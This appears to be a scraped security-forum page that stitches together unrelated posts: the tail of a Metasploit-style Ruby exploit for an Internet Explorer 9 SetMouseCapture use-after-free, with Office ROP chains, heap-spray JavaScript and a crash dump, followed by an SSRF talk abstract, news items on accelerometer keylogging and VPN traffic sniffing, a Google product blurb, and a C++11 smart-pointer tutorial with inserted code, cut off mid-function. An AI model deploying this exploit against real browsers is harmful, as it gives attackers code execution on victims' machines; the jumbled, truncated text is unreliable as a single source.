    p    = ''

    case rop_dll
    when :office2007
      rop = [
        junk,        # Alignment
        0x51c46f91,  # POP EBP # RETN [hxds.dll]
        0x51c46f91,  # skip 4 bytes [hxds.dll]
        0x51c35a4d,  # POP EBX # RETN [hxds.dll]
        0xffffffff,
        0x51bd90fd,  # INC EBX # RETN [hxds.dll]
        0x51bd90fd,  # INC EBX # RETN [hxds.dll]
        0x51bfa98e,  # POP EDX # RETN [hxds.dll]
        0xffffefff,
        0x51c08b65,  # XCHG EAX, EDX # RETN [hxds.dll]
        0x51c1df88,  # NEG EAX # RETN [hxds.dll]
        0x51c55c45,  # DEC EAX, RETN [hxds.dll]
        0x51c08b65,  # XCHG EAX, EDX # RETN [hxds.dll]
        0x51c4c17c,  # POP ECX # RETN [hxds.dll]
        0xffffffc0,
        0x51bfbaae,  # XCHG EAX, ECX # RETN [hxds.dll]
        0x51c1df88,  # NEG EAX # RETN [hxds.dll]
        0x51bfbaae,  # XCHG EAX, ECX # RETN [hxds.dll]
        0x51c05766,  # POP EDI # RETN [hxds.dll]
        0x51bfbaaf,  # RETN (ROP NOP) [hxds.dll]
        0x51c2e77d,  # POP ESI # RETN [hxds.dll]
        0x51bfc840,  # JMP [EAX] [hxds.dll]
        0x51c05266,  # POP EAX # RETN [hxds.dll]
        0x51bd115c,  # ptr to &VirtualAlloc() [IAT hxds.dll]
        0x51bdf91f,  # PUSHAD # RETN [hxds.dll]
        0x51c4a9f3,  # ptr to 'jmp esp' [hxds.dll]
      ].pack("V*")
    when :office2010
      rop = [
        # 4 dword junks due to the add esp in stack pivot
        junk, junk, junk, junk,
        0x51c41953,  # POP EBP # RETN [hxds.dll]
        0x51be3a03,  # RETN (ROP NOP) [hxds.dll]
        0x51c41953,  # skip 4 bytes [hxds.dll]
        0x51c4486d,  # POP EBX # RETN [hxds.dll]
        0xffffffff,
        0x51c392d8,  # EXCHG EAX, EBX # RETN [hxds.dll]
        0x51bd1a77,  # INC EAX # RETN [hxds.dll]
        0x51bd1a77,  # INC EAX # RETN [hxds.dll]
        0x51c392d8,  # EXCHG EAX, EBX # RETN [hxds.dll]
        0x51bfa298,  # POP EDX # RETN [hxds.dll]
        0xffffefff,
        0x51bea84d,  # XCHG EAX, EDX # RETN [hxds.dll]
        0x51bf5188,  # NEG EAX # POP ESI # RETN [hxds.dll]
        junk,
        0x51bd5382,  # DEC EAX # RETN [hxds.dll]
        0x51bea84d,  # XCHG EAX, EDX # RETN [hxds.dll]
        0x51c1f094,  # POP ECX # RETN [hxds.dll]
        0xffffffc0,
        0x51be5986,  # XCHG EAX, ECX # RETN [hxds.dll]
        0x51bf5188,  # NEG EAX # POP ESI # RETN [hxds.dll]
        junk,
        0x51be5986,  # XCHG EAX, ECX # RETN [hxds.dll]
        0x51bf1ff0,  # POP EDI # RETN [hxds.dll]
        0x51bd5383,  # RETN (ROP NOP) [hxds.dll]
        0x51c07c8b,  # POP ESI # RETN [hxds.dll]
        0x51bfc7cb,  # JMP [EAX] [hxds.dll]
        0x51c44707,  # POP EAX # RETN [hxds.dll]
        0x51bd10bc,  # ptr to &VirtualAlloc() [IAT hxds.dll]
        0x51c3604e,  # PUSHAD # RETN [hxds.dll]
        0x51c541ef,  # ptr to 'jmp esp' [hxds.dll]
      ].pack("V*")
    end

    p = rop + code
    p
  end

  def get_exploit_html(cli, req, rop_dll)
    gadgets = {}

    case rop_dll
    when :office2007
      gadgets[:spray1]   = 0x1af40020 # 0x31610020-0xc4, pointer to gadgets[:call_eax]
      gadgets[:target]   = 0x3160ff5c # mov eax, [esi] # push esi # call [eax+4]
      gadgets[:call_eax] = 0x51bd1ce8 # xchg eax,esp # add byte [eax], al # pop esi # mov [edi+23c], ebp # mov [edi+238], ebp # mov [edi+234], ebp # pop ebp # pop ebx # ret
      gadgets[:pivot]    = 0x51be4418
    when :office2010
      gadgets[:spray1]   = 0x1a7f0020 # 0x30200020-0xc4, pointer to gadgets[:call_eax]
      gadgets[:target]   = 0x301fff5c # mov eax, [esi] # push esi # call [eax+4]
      gadgets[:call_eax] = 0x51bd1a41 # xchg eax,esp # add eax,dword ptr [eax] # add esp,10 # mov eax,esi # pop esi # pop ebp # retn 4
      gadgets[:pivot]    = 0x51c00e64
    end

    p1 = [
      gadgets[:target], # Target address
      gadgets[:pivot]   # stack pivot
    ].pack("V*")
    p1 << get_payload(rop_dll)

    p2 = [
      gadgets[:call_eax] # MSHTML!CTreeNode::NodeAddRef+0x48 (call eax)
    ].pack("V*")

    js_s1 = Rex::Text::to_unescape([gadgets[:spray1]].pack("V*"))
    js_p1 = Rex::Text.to_unescape(p1)
    js_p2 = Rex::Text.to_unescape(p2)

    %Q|
    <html>
    <script>
    #{js_property_spray}

    function loadOffice() {
      try{location.href='ms-help://'} catch(e){}
    }

    var a = new Array();

    function spray() {
      var obj = '';
      for (i=0; i<20; i++) {
        if (i==0) {
          obj += unescape("#{js_s1}");
        } else {
          obj += "\\u4242\\u4242";
        }
      }
      obj += "\\u5555";

      for (i=0; i<10; i++) {
        var e = document.createElement("div");
        e.className = obj;
        a.push(e);
      }

      var s1 = unescape("#{js_p1}");
      sprayHeap({shellcode:s1, maxAllocs:0x300});

      var s2 = unescape("#{js_p2}");
      sprayHeap({shellcode:s2, maxAllocs:0x300});
    }

    function hit() {
      var id_0 = document.createElement("sup");
      var id_1 = document.createElement("audio");
      document.body.appendChild(id_0);
      document.body.appendChild(id_1);
      id_1.applyElement(id_0);
      id_0.onlosecapture=function(e) {
        document.write("");
        spray();
      }
      id_0['outerText']="";
      id_0.setCapture();
      id_1.setCapture();
    }

    for (i=0; i<20; i++) {
      document.createElement("frame");
    }

    window.onload = function() {
      loadOffice();
      hit();
    }
    </script>
    </html>
    |
  end

  def on_request_uri(cli, request)
    agent = request.headers['User-Agent']
    unless is_win7_ie9?(agent)
      print_error("Not a suitable target: #{agent}")
      send_not_found(cli)
      return  # stop here; otherwise the exploit page would still be served below
    end

    html = ''
    if request.uri =~ /\?dll=(\w+)$/
[/CODE]
rop_dll = '' if $1 == 'office2007' print_status("Using Office 2007 ROP chain") rop_dll = :office2007 elsif $1 == 'office2010' print_status("Using Office 2010 ROP chain") rop_dll = :office2010 else print_error("Target does not have Office installed") send_not_found(cli) return end html = get_exploit_html(cli, request, rop_dll) else print_status("Checking target requirements...") html = get_preq_html(cli, request) end send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'}) end def exploit @exploit_page = "default.html" super end end =begin hxds.dll (Microsoft® Help Data Services Module) 2007 DLL info: ProductVersion: 2.05.50727.198 FileVersion: 2.05.50727.198 (QFE.050727-1900) 2010 DLL info: ProductVersion: 2.05.50727.4039 FileVersion: 2.05.50727.4039 (QFE.050727-4000) mshtml.dll ProductVersion: 9.00.8112.16446 FileVersion: 9.00.8112.16446 (WIN7_IE9_GDR.120517-1400) FileDescription: Microsoft (R) HTML Viewer 0:005> r eax=41414141 ebx=6799799c ecx=679b6a14 edx=00000000 esi=00650d90 edi=021fcb34 eip=679b6b61 esp=021fcb0c ebp=021fcb20 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 MSHTML!CTreeNode::GetInterface+0xd8: 679b6b61 8b08 mov ecx,dword ptr [eax] ds:0023:41414141=???????? 66e13df7 8b0e mov ecx,dword ptr [esi] 66e13df9 8b11 mov edx,dword ptr [ecx] <-- mshtml + (63993df9 - 63580000) 66e13dfb 8b82c4000000 mov eax,dword ptr [edx+0C4h] 66e13e01 ffd0 call eax =end Sursa: Microsoft Internet Explorer SetMouseCapture Use-After-Free ? Packet Storm
-
Hitb 2013 - V. Vorontsov And A. Golovko - Ssrf Pwns - New Techniques And Stories Description: PRESENTATION ABSTRACT: Server Side Request Forgery (SSRF) has been known since 2008, but has only recently been used in practical information security work. Vulnerabilities of this class give the attacker the ability to send different requests on behalf of the server, which in turn allows bypassing various network perimeter restrictions, giving the attacker the ability to create requests from the vulnerable servers to the intranet/internet. Using the various protocols supported by the URI schemes available in network libraries (such as cURL, LWP and others), attackers can communicate with local and intranet services. SSRF is used, as a rule, to forge HTTP requests, and SMB requests to carry out attacks like SMB relay. We have expanded the spectrum of SSRF attacks to protocols which are not supported by network libraries by default and have also collected all SSRF-related info into a cheatsheet. We will show attacks on memcached and PHP FastCGI, will talk about the possibility of working directly with sockets of different applications through SSRF, and will present various examples of vulnerabilities and exploitation, including new techniques for data retrieval using blind SSRF. Part of this presentation will be dedicated to the story of many SSRF-related exploits of Yandex, a leading Internet company in Russia which operates one of the most popular search engines. ABOUT VLADIMIR VORONTSOV Vladimir Vorontsov is the founder and lead analyst of ONsec. Vladimir has been engaged in research in the field of web application security since 2004. He is the CEO and lead expert of the ONsec company as well as the author of numerous pieces of research in the field of web application security.
He was awarded by Yandex for winning the "vulnerability search month" contest, by Google for Chrome vulnerabilities, by Trustwave for the ModSecurity SQLi Challenge, and by 1C Bitrix for a competition on proactive defense bypass. He is currently actively engaged in the development of a web application firewall system. ABOUT ALEXANDER GOLOVKO Alexander Golovko has been a security expert at ONsec since 2009. Alexander specializes in network security and operating systems. He is also an active Debian GNU/Linux maintainer. Alexander and Vladimir are the authors of the "SSRF bible. Cheatsheet": http://goo.gl/xSoCq For More Information please visit : - HITBSecConf - NETHERLANDS / MALAYSIA Sursa: Hitb 2013 - V. Vorontsov And A. Golovko - Ssrf Pwns - New Techniques And Stories
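The abstract above describes the attacker's side: the server's HTTP client will happily follow whatever URI scheme and destination it is handed. The check a defender wants in front of any server-side fetch is an egress allow-list. The following is an added example, not code from the talk or from the SSRF cheatsheet; the function name url_allowed_for_egress and the policy it encodes (http/https only, no userinfo, no IPv6 literals, no loopback/private/link-local dotted quads, no "localhost") are this example's own choices.

```cpp
#include <cctype>
#include <cstddef>
#include <cstdint>
#include <string>

// Parses a strict dotted quad (four labels of 1-3 digits, no leading zeros,
// each <= 255). Forms like "2130706433" or "0177.0.0.1" are rejected on
// purpose: a resolver may accept them, this check will not.
static bool parse_dotted_quad(const std::string& host, std::uint32_t& out) {
    unsigned parts[4];
    int n = 0;
    std::string cur;
    for (std::size_t i = 0; i <= host.size(); ++i) {
        if (i == host.size() || host[i] == '.') {
            if (cur.empty() || cur.size() > 3 || n == 4) return false;
            if (cur.size() > 1 && cur[0] == '0') return false;   // octal ambiguity
            unsigned v = static_cast<unsigned>(std::stoul(cur));
            if (v > 255) return false;
            parts[n++] = v;
            cur.clear();
        } else if (std::isdigit(static_cast<unsigned char>(host[i]))) {
            cur += host[i];
        } else {
            return false;
        }
    }
    if (n != 4) return false;
    out = (parts[0] << 24) | (parts[1] << 16) | (parts[2] << 8) | parts[3];
    return true;
}

// Address ranges a server-side fetch must never reach directly.
static bool is_forbidden_v4(std::uint32_t ip) {
    struct Range { std::uint32_t net; int bits; };
    static const Range blocked[] = {
        {0x00000000, 8},   // 0.0.0.0/8
        {0x0A000000, 8},   // 10.0.0.0/8
        {0x7F000000, 8},   // 127.0.0.0/8 loopback
        {0xA9FE0000, 16},  // 169.254.0.0/16 link-local
        {0xAC100000, 12},  // 172.16.0.0/12
        {0xC0A80000, 16},  // 192.168.0.0/16
    };
    for (const Range& r : blocked) {
        std::uint32_t mask = 0xFFFFFFFFu << (32 - r.bits);
        if ((ip & mask) == r.net) return true;
    }
    return false;
}

static void lowercase(std::string& s) {
    for (char& c : s) c = static_cast<char>(std::tolower(static_cast<unsigned char>(c)));
}

// Hypothetical egress policy check on the URL string. It inspects only the
// string: a hostname that passes must still be resolved and the resulting
// address re-checked with is_forbidden_v4 before connecting, otherwise a
// DNS answer can point the server back at an internal address.
bool url_allowed_for_egress(const std::string& url) {
    std::size_t p = url.find("://");
    if (p == std::string::npos) return false;
    std::string scheme = url.substr(0, p);
    lowercase(scheme);
    if (scheme != "http" && scheme != "https") return false;   // no file:, gopher:, dict:, ...

    std::size_t start = p + 3;
    std::size_t end = url.find_first_of("/?#", start);
    std::string authority = url.substr(start, end == std::string::npos ? std::string::npos : end - start);
    if (authority.empty()) return false;
    if (authority.find('@') != std::string::npos) return false;  // userinfo confusion
    if (authority[0] == '[') return false;                        // IPv6 literal not allow-listed

    std::string host = authority.substr(0, authority.find(':'));  // strip port
    lowercase(host);
    if (host.empty() || host == "localhost") return false;

    bool numeric = true;
    for (char c : host) {
        if (!std::isdigit(static_cast<unsigned char>(c)) && c != '.') numeric = false;
    }
    if (numeric) {
        std::uint32_t ip = 0;
        if (!parse_dotted_quad(host, ip)) return false;
        return !is_forbidden_v4(ip);
    }
    return true;  // hostname: caller resolves it and re-checks the address
}
```

The design keeps the check an allow-list: anything the parser does not understand is rejected rather than passed through, which is what turns the "exotic scheme" and "odd IP notation" families in the abstract into non-events.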
-
[h=1]Researchers can keylog your PC using your iPhone's accelerometer[/h] [h=2]An iPhone's accelerometer is good for more than just games, according to …[/h] by Chris Foresman - Oct 19 2011, 8:45pm GTBST Georgia Tech assistant professor of computer science Patrick Traynor. Image courtesy of Georgia Tech Researchers at Georgia Tech and MIT have developed a proof of concept to demonstrate that it is possible to record a computer user's keystrokes using an iPhone 4's accelerometer. The researchers developed a method to accurately translate the vibrations from typing on a keyboard picked up by the device's accelerometer when it is placed on a desk near a PC. Though they warn that hackers could potentially use their method to eavesdrop on a user's keystrokes, they believe the actual threat is quite low. The method, detailed in a paper titled "(sp)iPhone: Decoding Vibrations From Nearby Keyboards Using Mobile Phone Accelerometers," works by interpreting pairs of keystrokes in successive order. According to principal researcher Patrick Traynor, assistant professor at Georgia Tech's School of Computer Science, the method can't reliably pinpoint single keystrokes. But by characterizing the successive strokes as left-right, right-left, left-left, or right-right, and then whether the pair is nearer or further away from the device, the pairs can be statistically analyzed to represent probable letter pairs. Those pairs can then be compared to a dictionary. According to Traynor, the method is 80 percent accurate with a 58,000 word dictionary. Even that accuracy, though, requires thoroughly modern equipment. "We first tried our experiments with an iPhone 3GS, and the results were difficult to read," Traynor said in a statement. "But then we tried an iPhone 4, which has an added gyroscope to clean up the accelerometer noise, and the results were much better.
We believe that most smartphones made in the past two years are sophisticated enough to launch this attack." Similar keylogging methods have been developed which use a smartphone's microphone. But according to the researchers, malware masquerading as a legitimate app can usually access a smartphone's accelerometer without tripping the built-in security features that tend to prevent access to a device's sensors without a specific OK from the user. Traynor characterized the likelihood of a smartphone user succumbing to such keyboard eavesdropping as "pretty low." With only 80 percent accuracy, the attack would likely have trouble accurately interpreting usernames or passwords that aren't common dictionary terms. And with an effective range of just three inches, users can easily mitigate any potential threat by keeping their iPhone further away from their keyboard, or off the desk entirely. The paper will be presented Thursday at the currently in progress 18th ACM Conference on Computer and Communications Security in Chicago. Sursa: Researchers can keylog your PC using your iPhone's accelerometer | Ars Technica
-
VPN provider 'Proxy.sh' sniffed the traffic of US based server to Catch Hackers Author: Mohit Kumar, The Hacker News - Monday, September 30, 2013 The very first question we always try to figure out before choosing a trusted VPN service: can't a VPN provider just look at my traffic all they want and see what I'm doing? Well, a reputed VPN provider today answered the question and admitted that they sniffed the traffic on one of their United States-based servers in order to catch an alleged hacker. Proxy.sh, a quality VPN service with a no-logging policy, made a surprise announcement: "We are unfortunate to announce that there have been abuses complaints about hacking activities on our U.S. Illinois 1 node. We have been saddened to learn that these actions were harmful to individuals (human beings). As a result, we will open this node again and monitor it with Wireshark for a period of 7 days." Torrentfreak noticed that there was no mention of any legal process, court order, police action or other similar outside influence compelling Proxy.sh to do so. The monitoring was triggered after Proxy.sh received a complaint from someone who claimed they were being harassed by a Proxy.sh user. The VPN provider then allegedly took it upon themselves to try and sort out the problem. "If you are the hacker, please stop your activities and leave our network. You are not welcome here. Our heaven is reserved for those who are not harmful to other human beings. If you do not leave, we will find you and report your activities to NGO and press officers. For all others, the heaven is still safe for you, dear ones. We will completely remove Wireshark after 7 days and restart the node so that everything is erased (RAM-switch). All other nodes are left unaffected by these actions. Update: Wireshark has now been removed/wiped." Later Proxy.sh provided the final statement: "We have decided to install a monitor on our Illinois 1 node so as to locate the hacker.
A few hours after we announced this move to our public, the hacker came to us to apologize. We then completely removed the Wireshark installation." Not all VPN service providers are worth your trust. Some diligently log your connection times, dates and IP addresses, keep track of how long you're connected, and some even keep an eye on the types of traffic that you send through their networks while you're logged in. The best defense for user data is a quality VPN service, which will send the data through an encrypted tunnel to a secure in-house server, hiding sensitive information from potential data thieves. Sursa: VPN provider 'Proxy.sh' sniffed the traffic of US based server to Catch Hackers - The Hacker News
-
[h=1] Web Designer[/h] [h=1]Bring ideas to life across screens[/h] Create engaging, interactive HTML5-based designs and motion graphics that can run on any device. Download Web Designer Beta [h=2]One idea. Any screen.[/h] It doesn't matter how brilliant your work is if people can't see it. Now everything you create is accessible on any screen – desktop, tablet or mobile – without compatibility issues. Information: http://www.google.com/webdesigner/
-
[h=1]C++11 Smart Pointers[/h]By syed_babu, 26 Sep 2013 Download Unique Pointer source - 4.54 KB Download Weak Pointer source - 3.95 KB Download Shared Pointer source - 4.31 KB [h=2]Introduction[/h] Ooops. Yet another article on the smart pointers of C++11. Nowadays I hear a lot of people talking about the new C++ standard, C++0x/C++11. I went through some of the language features of C++11 and it's really amazing work. I'll focus only on the smart pointers section of C++11. [h=2]Background[/h] [h=3]What are the issues with normal/raw/naked pointers?[/h] Let's go one by one. People refrain from using pointers as they cause a lot of issues if not handled properly. That's why newbie programmers dislike pointers. Many issues are involved with pointers, like ensuring the lifetime of objects referred to by pointers, dangling references, and memory leaks. A dangling reference is caused if a memory block is pointed to by more than one pointer variable and one of the pointers is released without letting the other pointer know. As all of you know, memory leaks occur when a block of memory is fetched from the heap and is not released back. People say, "I write clean and error-proof code, why should I use smart pointers?" And a programmer asked me, "Hey, here is my code. I fetched the memory from the heap, manipulated it, and after that I released it properly. What is the need of a smart pointer?"

void Foo( )
{
    int* iPtr = new int[5];
    //manipulate the memory block
    . . .
    delete[ ] iPtr;
}

The above code works fine and memory is released properly under ideal circumstances. But think of the practical environment of code execution. The instructions between memory allocation and release can do nasty things like accessing an invalid memory location, dividing by zero, or, say, another programmer pitching into your program to fix a bug and adding a premature return statement based on some condition.
In all the above cases, you will never reach the point where the memory is released. This is because the first two cases throw an exception whereas the third one is a premature return. So the memory is leaked while the program is running. The one-stop solution for all of the above issues is smart pointers [if they are really smart enough]. [h=3]What is a smart pointer?[/h] A smart pointer is a RAII-modeled class to manage dynamically allocated memory. It provides all the interfaces provided by normal pointers, with a few exceptions. During construction, it takes ownership of the memory and releases it when it goes out of scope. In this way, the programmer is freed from managing dynamically allocated memory. C++98 introduced the first of its kind, called auto_ptr. [h=2]auto_ptr[/h] Let's see the use of auto_ptr and how smart it is in resolving the above issues.

#include <iostream>
#include <memory>
using namespace std;

class Test
{
public:
    Test(int a = 0 ) : m_a(a) { }
    ~Test( ) { cout<<"Calling destructor"<<endl; }
public:
    int m_a;
};

int main( )
{
    std::auto_ptr<Test> p( new Test(5) );
    cout<<p->m_a<<endl;
}

The above code is smart enough to release the memory associated with it. What we did is, we fetched a memory block to hold an object of type Test and associated it with the auto_ptr p. So when p goes out of scope, the associated memory block is also released.

#include <iostream>
#include <memory>
using namespace std;

//***************************************************************
class Test
{
public:
    Test(int a = 0 ) : m_a(a) { }
    ~Test( ) { cout<<"Calling destructor"<<endl; }
public:
    int m_a;
};
//***************************************************************
void Fun( )
{
    int a = 0, b= 5, c;
    if( a ==0 )
    {
        throw "Invalid divisor";
    }
    c = b/a;
    return;
}
//***************************************************************
int main( )
{
    try
    {
        std::auto_ptr<Test> p( new Test(5) );
        Fun( );
        cout<<p->m_a<<endl;
    }
    catch(...)
    {
        cout<<"Something has gone wrong"<<endl;
    }
}

In the above case, an exception is thrown but the pointer is still released properly.
This is because of stack unwinding, which happens when an exception is thrown. As all local objects belonging to the try block are destroyed, p goes out of scope and it releases the associated memory. Issue 1: So far auto_ptr is smart. But it has more fundamental flaws despite its smartness. auto_ptr transfers ownership when it is assigned to another auto_ptr. This is really an issue while passing the auto_ptr between functions. Say I have an auto_ptr in Foo( ) and this pointer is passed to another function, say Fun( ), from Foo. Once Fun( ) completes its execution, the ownership is not returned back to Foo.

#include <iostream>
#include <memory>
using namespace std;

//***************************************************************
class Test
{
public:
    Test(int a = 0 ) : m_a(a) { }
    ~Test( ) { cout<<"Calling destructor"<<endl; }
public:
    int m_a;
};
//***************************************************************
void Fun(auto_ptr<Test> p1 )
{
    cout<<p1->m_a<<endl;
}
//***************************************************************
int main( )
{
    std::auto_ptr<Test> p( new Test(5) );
    Fun(p);
    cout<<p->m_a<<endl;   // p no longer owns anything: crash
}

The above code causes a program crash because of the weird behavior of auto_ptr. What happens is that p owns a memory block and when Fun is called, p transfers the ownership of its associated memory block to the auto_ptr p1, which is the copy of p. Now p1 owns the memory block which was previously owned by p. So far it is fine. Now Fun has completed its execution, p1 goes out of scope and the memory block is released. How about p? p does not own anything, and that is why it causes a crash when the next line is executed, which accesses p thinking that it still owns some resource. Issue 2: Yet another flaw. auto_ptr cannot be used with an array of objects. I mean it cannot be used with operator new[].

//***************************************************************
// Test as defined above
int main( )
{
    std::auto_ptr<Test> p(new Test[5]);
}

The above code gives a runtime error.
This is because when auto_ptr goes out of scope, delete is called on the associated memory block. This is fine if auto_ptr owns only a single object. But in the above code, we have created an array of objects on the heap, which should be destroyed using delete[ ] and not delete. Issue 3: auto_ptr cannot be used with standard containers like vector, list, map, etc. As auto_ptr is error prone and it will be deprecated, C++11 has come with a new set of smart pointers, each with its own purpose: shared_ptr, unique_ptr and weak_ptr. [h=2]shared_ptr[/h] OK, get ready to enjoy the real smartness. The first of its kind is shared_ptr, which has the notion called shared ownership. The goal of shared_ptr is very simple: multiple shared pointers can refer to a single object, and when the last shared pointer goes out of scope, memory is released automatically. Creation:

#include <memory>
using namespace std;

int main( )
{
    shared_ptr<int> sptr1( new int );
}

Make use of the make_shared function template, which expedites the creation process. As shared_ptr allocates memory internally to hold the reference count, make_shared( ) is implemented in a way that does this job efficiently.

#include <memory>
using namespace std;

int main( )
{
    shared_ptr<int> sptr1 = make_shared<int>(100);
}

The above code creates a shared_ptr which points to a memory block holding an integer with value 100 and a reference count of 1. If another shared pointer is created out of sptr1, the reference count goes up to 2. This count is known as the strong reference. Apart from this, the shared pointer has another reference count known as the weak reference, which will be explained when visiting weak pointers. You can find out the number of shared_ptrs referring to the resource by getting the reference count with use_count( ). And while debugging, you can get it by watching the strong_ref of the shared_ptr. Destruction: shared_ptr releases the associated resource by calling delete by default. If the user needs a different destruction policy, he/she is free to specify it while constructing the shared_ptr.
The following code is a source of trouble due to the default destruction policy:

#include <iostream>
#include <memory>
using namespace std;

class Test
{
public:
    Test(int a = 0 ) : m_a(a) { }
    ~Test( ) { cout<<"Calling destructor"<<endl; }
public:
    int m_a;
};

int main( )
{
    shared_ptr<Test> sptr1( new Test[5] );   // delete called on a new[] block
}

Because shared_ptr owns an array of objects, it calls delete when it goes out of scope. Actually, delete[ ] should have been called to destroy the array. The user can specify a custom deallocator via a callable object, i.e., a function, lambda expression, or function object.

int main( )
{
    shared_ptr<Test> sptr1( new Test[5], [ ](Test* p) { delete[ ] p; } );
}

The above code works fine as we have specified that the destruction should happen via delete[]. [h=4]Interface[/h] shared_ptr provides the dereferencing operators * and -> like a normal pointer does. Apart from that it provides some more important interfaces like:
get( ) : To get the resource associated with the shared_ptr.
reset( ) : To yield the ownership of the associated memory block. If this is the last shared_ptr owning the resource, then the resource is released automatically.
unique( ) : To know whether the resource is managed by only this shared_ptr instance.
operator bool : To check whether the shared_ptr owns a memory block or not. Can be used with an if condition.
OK, that is all about shared_ptrs. But shared_ptrs too have a few issues. Issues: If a memory block is associated with shared_ptrs belonging to different groups, then there is an error. All shared_ptrs sharing the same reference count belong to a group. Let's see an example.

int main( )
{
    shared_ptr<int> sptr1( new int );
    shared_ptr<int> sptr2 = sptr1;
    shared_ptr<int> sptr3;
    sptr3 = sptr2;
}

The below table gives you the reference count values for the above code. All shared_ptrs share the same reference count, hence belonging to the same group. The above code is fine. Let's see another piece of code.
int main( )
{
    int* p = new int;
    shared_ptr<int> sptr1( p );
    shared_ptr<int> sptr2( p );   // second, unrelated group owning the same block
}

There is another issue involved with creating a shared pointer from a naked pointer. In the above code, consider that only one shared pointer is created using p and the code works fine. Consider that by mistake a programmer deletes the naked pointer p before the scope of the shared pointer ends. Oooppss!!! Yet another crash. Cyclic Reference: Resources are not released properly if a cyclic reference of shared pointers is involved. Consider the following piece of code.

#include <iostream>
#include <memory>
using namespace std;

class B;
class A
{
public:
    A( ) : m_sptrB(nullptr) { };
    ~A( ) { cout<<" A is destroyed"<<endl; }
    shared_ptr<B> m_sptrB;
};

class B
{
public:
    B( ) : m_sptrA(nullptr) { };
    ~B( ) { cout<<" B is destroyed"<<endl; }
    shared_ptr<A> m_sptrA;
};
//***********************************************************
int main( )
{
    shared_ptr<B> sptrB( new B );
    shared_ptr<A> sptrA( new A );
    sptrB->m_sptrA = sptrA;
    sptrA->m_sptrB = sptrB;
}

The above code has a cyclic reference. I mean, class A holds a shared pointer to B and class B holds a shared pointer to A. In this case, the resources associated with both sptrA and sptrB are not released. Refer to the below table. Reference counts for both sptrA and sptrB go down to 1 when they go out of scope, and hence the resources are not released!!!!! To resolve the cyclic reference, C++ provides another smart pointer class called weak_ptr. [h=2]Weak_Ptr[/h] A weak pointer provides sharing semantics and not owning semantics. This means a weak pointer can share a resource held by a shared_ptr. So to create a weak pointer, somebody should already own the resource, which is nothing but a shared pointer. A weak pointer does not allow the normal interfaces supported by a pointer, like *, ->. Because it is not the owner of the resource, it does not give the programmer any chance to mishandle it. Then how do we make use of a weak pointer?
The answer is to create a shared_ptr out of the weak_ptr and use it. This makes sure that the resource won't be destroyed while in use, by incrementing the strong reference count. As the reference count is incremented, the count will be at least 1 until you finish using the shared_ptr created out of the weak_ptr. Otherwise, what may happen is that while using the weak_ptr, the shared_ptr holding the resource goes out of scope and the memory is released, which creates chaos. [h=4]Creation[/h] A weak pointer constructor takes a shared pointer as one of its parameters. Creating a weak pointer out of a shared pointer increases the weak reference counter of the shared pointer. This means that the shared pointer shares its resource with another pointer. But this counter is not considered when releasing the resource as the shared pointer goes out of scope. I mean, if the strong reference of the shared pointer goes to 0, then the resource is released irrespective of the weak reference value.

#include <memory>
using namespace std;

// Test as defined above
int main( )
{
    shared_ptr<Test> sptr( new Test );
    weak_ptr<Test> wptr( sptr );
    weak_ptr<Test> wptr1 = wptr;
}

We can watch the reference counters of the shared/weak pointer. Assigning a weak pointer to another weak pointer increases the weak reference count. So what happens when a weak pointer points to a resource held by the shared pointer and the shared pointer destroys the associated resource when it goes out of scope? The weak pointer expires. How do we check whether the weak pointer is pointing to a valid resource? There are two ways:
Call the use_count( ) method to know the count. Note that this method returns the strong reference count and not the weak reference.
Call the expired( ) method. This is faster than calling use_count( ).
To get a shared_ptr from a weak_ptr, call lock( ) or directly cast the weak_ptr to a shared_ptr.
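The counts the article keeps referring to (the lost tables, the "stays at 1" cycle, expired() versus lock()) are easiest to understand when the program itself reports them. The following is an added example, not the article's code: the types CycA/CycB (strong cycle), Parent/Child (weak back edge) and the helper functions are constructed for this illustration, and each type counts its live instances so that the effect of a strong versus a weak edge is visible after the owners leave scope.

```cpp
#include <memory>

// Constructed for this example: both edges strong, the article's cyclic case.
struct CycB;
struct CycA {
    std::shared_ptr<CycB> b;          // strong edge A -> B
    static int alive;
    CycA()  { ++alive; }
    ~CycA() { --alive; }
};
struct CycB {
    std::shared_ptr<CycA> a;          // strong edge B -> A closes the cycle
    static int alive;
    CycB()  { ++alive; }
    ~CycB() { --alive; }
};
int CycA::alive = 0;
int CycB::alive = 0;

// Constructed for this example: the back edge is weak, as the article's fix does.
struct Child;
struct Parent {
    std::shared_ptr<Child> child;     // strong edge: parent owns child
    static int alive;
    Parent()  { ++alive; }
    ~Parent() { --alive; }
};
struct Child {
    std::weak_ptr<Parent> parent;     // weak back edge: observes, does not own
    static int alive;
    Child()  { ++alive; }
    ~Child() { --alive; }
};
int Parent::alive = 0;
int Child::alive = 0;

// After both locals leave scope each object still holds the other, so both
// strong counts stay at 1 and nothing is destroyed. Returns the number of
// leaked objects, then breaks the cycle by hand so the example itself does
// not leak (resetting one edge frees both objects).
int survivors_with_strong_cycle() {
    CycA::alive = CycB::alive = 0;
    CycA* raw = nullptr;
    {
        std::shared_ptr<CycA> a = std::make_shared<CycA>();
        std::shared_ptr<CycB> b = std::make_shared<CycB>();
        a->b = b;
        b->a = a;
        raw = a.get();
    }
    int leaked = CycA::alive + CycB::alive;   // 2
    if (leaked == 2) raw->b.reset();          // B count -> 0, then A count -> 0
    return leaked;
}

// Same shape with a weak back edge: Parent's strong count is 1 (only the
// local), so it dies at scope exit and takes the child's last owner with it.
int survivors_with_weak_back_edge() {
    Parent::alive = Child::alive = 0;
    {
        std::shared_ptr<Parent> p = std::make_shared<Parent>();
        std::shared_ptr<Child> c = std::make_shared<Child>();
        p->child = c;      // c.use_count() becomes 2
        c->parent = p;     // p.use_count() stays 1; only the weak count grows
    }
    return Parent::alive + Child::alive;   // 0
}

// Strong counts seen from inside the linked pair while both locals are alive.
long child_strong_count_while_linked() {
    std::shared_ptr<Parent> p = std::make_shared<Parent>();
    std::shared_ptr<Child> c = std::make_shared<Child>();
    p->child = c;
    c->parent = p;
    return c.use_count();   // 2: the local c and p->child
}

// weak_ptr lifecycle: expired() is false while an owner exists, lock() yields
// a temporary owner (strong count 2), and once the last shared_ptr is gone
// the weak_ptr reports expired and lock() returns an empty shared_ptr.
bool weak_ptr_expires_with_owner() {
    std::weak_ptr<int> w;
    {
        std::shared_ptr<int> s = std::make_shared<int>(42);
        w = s;
        if (w.expired() || w.use_count() != 1) return false;
        std::shared_ptr<int> locked = w.lock();
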